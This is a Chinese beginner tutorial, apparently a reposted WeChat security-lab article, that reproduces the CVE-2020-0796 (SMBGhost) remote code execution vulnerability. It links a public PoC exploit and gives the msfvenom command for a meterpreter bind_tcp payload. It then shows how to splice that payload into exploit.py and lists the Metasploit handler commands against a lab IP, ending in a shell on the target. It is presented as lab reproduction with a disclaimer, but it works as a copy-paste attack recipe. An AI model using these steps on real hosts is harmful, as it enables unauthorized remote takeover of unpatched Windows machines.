小白级CVE-2020-0796漏洞复现教程

admin 2023年10月30日01:55:30评论47 views字数 1279阅读4分15秒阅读模式

1.通过扫描工具检测目标主机是否存在漏洞,可以使用以下工具进行扫描:

Windows工具:

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

Linux工具:

https://github.com/dickens88/cve-2020-0796-scanner

PS:windows系统直接打开exe文件运行会闪退,将文件拖入cmd回车运行即可小白级CVE-2020-0796漏洞复现教程

2.先查看kali与靶机是否互能互ping通,能ping通即可小白级CVE-2020-0796漏洞复现教程

3.通过扫描得知:该目标主机存在smb漏洞,可以远程执行。   小白级CVE-2020-0796漏洞复现教程

4.远程利用PoC漏洞:

https://github.com/chompie1337/SMBGhost_RCE_PoC

将此POC漏洞下载至Kail中,通过解压得到了以下文件:

小白级CVE-2020-0796漏洞复现教程

5.使用msfvenom生成payload

msfvenom  -p windows/x64/meterpreter/bind_tcp  lport=1234 -f py -o evil.py

小白级CVE-2020-0796漏洞复现教程

运行之后会在桌面上得到一个文件

小白级CVE-2020-0796漏洞复现教程

6.我们准备文本替换和修改:

我们打开刚才解压的压缩包,将evil.py 生成的数据全部复制,在wps中打开    

小白级CVE-2020-0796漏洞复现教程

在WPS的右上角的查找替换进行如下命令:

小白级CVE-2020-0796漏洞复现教程

替换之后得到了新的数据:

小白级CVE-2020-0796漏洞复现教程

此操作就是将原来的表头buf修改成为USER_PAYLOAD,这里我附上参数,方便大家复制粘贴

参数buf改为USER_PAYLOAD

之后我们把修改好的项目数据全部复制,打开exploit.py,把数据替换到exploit.py的USER_PAYLOAD参数,将此参数全部替换。保存后即可。

最后我们打开kail的msf工具:

Msf工具启动命令:

msfconsole 

   小白级CVE-2020-0796漏洞复现教程

小白级CVE-2020-0796漏洞复现教程

启动kail的监听模块:

use exploit/multi/handler

小白级CVE-2020-0796漏洞复现教程

设置模块连接:

set payload windows/x64/meterpreter/bind_tcp

小白级CVE-2020-0796漏洞复现教程

设置端听:

set lport 1234

 小白级CVE-2020-0796漏洞复现教程

设置攻击主机地址:

set rhost 10.110.84.119

小白级CVE-2020-0796漏洞复现教程

新建终端命令行,打开我们解压的文件,步骤如下

使用cd命令到文件的文件夹,ls列出文件,后直接执行命令
python3 exploit.py -ip 10.110.84.119

小白级CVE-2020-0796漏洞复现教程

如果看到了这个界面,直接回车,出现这个就是执行成功    

小白级CVE-2020-0796漏洞复现教程

最后我们启动设置的模块脚本直接执行命令:

run

小白级CVE-2020-0796漏洞复现教程

发现在msf控制台成功获得反弹shell,我们输入shell后会出现目标主机终端命令行,此时我们发现乱码,需要进行页面编码修改    

小白级CVE-2020-0796漏洞复现教程

发现有乱码,执行chcp 65001后显示正常,输入后需要回车

小白级CVE-2020-0796漏洞复现教程

最后我们执行ipconfig

小白级CVE-2020-0796漏洞复现教程

之后我们就获得了目标主机的终端行,最后我们查看目标主机的终端,执行ipconfig    

小白级CVE-2020-0796漏洞复现教程

最后检查,我们拿到的shell和靶机的一致,代码都在文章内,可以直接复制粘贴,有不懂的地方可以直接联系我!

小白级CVE-2020-0796漏洞复现教程

文章仅供技术参考和本地漏洞测试复现,一切后果由使用者承担,与本号无关,切勿知法犯法!!!!

原文始发于微信公众号(云延网络攻防实验室):小白级CVE-2020-0796漏洞复现教程

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月30日01:55:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   小白级CVE-2020-0796漏洞复现教程http://cn-sec.com/archives/2154718.html

发表评论

匿名网友 填写信息